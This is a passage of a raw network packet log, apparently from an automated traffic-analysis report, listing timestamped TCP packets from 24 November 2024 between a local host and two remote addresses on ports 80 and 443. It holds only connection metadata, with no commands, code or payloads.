                                                                                                                                                                                              Nov 24, 2024 13:39:31.768515110 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.769244909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.769284010 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.769340992 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.770122051 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.770163059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.770205975 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.770967960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.771013021 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.771055937 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.771855116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.771908998 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.771939039 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.772794962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.772835016 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.772870064 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.773673058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.773715973 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.773772001 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.774525881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.774565935 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.774591923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.775398016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.775440931 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.775480032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.776303053 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.776346922 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.776427984 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.777188063 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.777205944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.777229071 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.778028965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.778079033 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.778115034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.778893948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.778934956 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.778975964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.779783964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.779830933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.779872894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.780669928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.780716896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.780719042 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.781537056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.781599045 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.781640053 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.782413006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.782458067 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.782510042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.783307076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.783348083 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.783389091 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.784193039 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.784233093 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.784327030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.785060883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.785099030 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.785170078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.785952091 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.785990953 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.786025047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.786833048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.786874056 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.787045002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.787727118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.787765980 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.787894964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.788575888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.788639069 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.788664103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.789446115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.789486885 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.789541960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.790335894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.790381908 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.790466070 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.791024923 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.791194916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.791239023 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.791296959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.792130947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.792171001 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.792188883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.792944908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.792987108 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.793037891 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.793946028 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.793982983 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.794023037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.794826031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.794866085 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.794871092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.795654058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.795695066 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.795752048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.796495914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.796535969 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.796611071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.797372103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.797410965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.797492981 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.798243999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.798280954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.798351049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.798496008 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.799169064 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.799216032 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.799252987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.799884081 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.800086975 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.800129890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.800169945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.800987959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.801027060 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.801068068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.801121950 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.801932096 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.802004099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.802042961 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.802396059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.802615881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.802762985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.802803040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.803524971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.803664923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.803703070 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.932934046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.933037996 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.933176994 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.933358908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.933456898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.933496952 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.934046984 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.934134007 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.934174061 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.934746027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.971508026 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.971636057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.971714973 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.971837997 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.971926928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.972045898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.972767115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.972803116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.972836971 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.973591089 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.973649979 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.973690033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.974605083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.974658966 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.974721909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.975423098 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.975467920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.975482941 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.976272106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.976319075 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.976377964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.977096081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.977142096 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.977200031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.978126049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.978173018 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.978256941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.978945971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.979023933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.979026079 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.979737043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.979795933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.979847908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.980618954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.980669975 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.980819941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.981499910 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:31.981547117 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:31.981579065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:32.026865005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:32.825930119 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:32.826755047 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:32.826775074 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:32.827333927 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:32.827338934 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:32.947232008 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:32.951982021 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:32.952003002 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:32.952471972 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:32.952478886 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.225574017 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.226329088 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.226347923 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.226825953 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.226830959 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.227379084 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.230179071 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.230191946 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.230595112 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.230601072 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.272021055 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.272170067 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.272249937 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.272469044 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.272486925 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.272501945 CET49763443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.272507906 CET4434976313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.275326967 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.275357962 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.275434017 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.275732994 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.275747061 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.331409931 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.331870079 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.331882954 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.332644939 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.332649946 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.446993113 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.447063923 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.447127104 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.447351933 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.447374105 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.447386026 CET49764443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.447391987 CET4434976413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.450294971 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.450336933 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.450401068 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.450555086 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.450570107 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.669770956 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.669836998 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.669881105 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.669888973 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.670047998 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.670097113 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.670758009 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.670775890 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.670785904 CET49766443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.670789957 CET4434976613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.672032118 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.672049046 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.672063112 CET49765443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.672068119 CET4434976513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.674345970 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.674386024 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.674457073 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.675343037 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.675368071 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.675434113 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.675534964 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.675548077 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.675641060 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.675652027 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.779553890 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.779614925 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.779668093 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.779917955 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.779927015 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.779937983 CET49767443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.779942036 CET4434976713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.782915115 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.782994986 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:33.783081055 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.783230066 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:33.783263922 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.063599110 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.064274073 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.064301968 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.064846992 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.064851999 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.306184053 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.306657076 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.306682110 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.307194948 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.307200909 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.467964888 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.468600035 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.468627930 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.469137907 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.469142914 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.500808954 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.501269102 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.501300097 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.501660109 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.501669884 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.507925987 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.507986069 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.508044004 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.508285046 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.508304119 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.508316994 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:35.508323908 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:35.511547089 CET49773443192.168.2.613.107.246.63
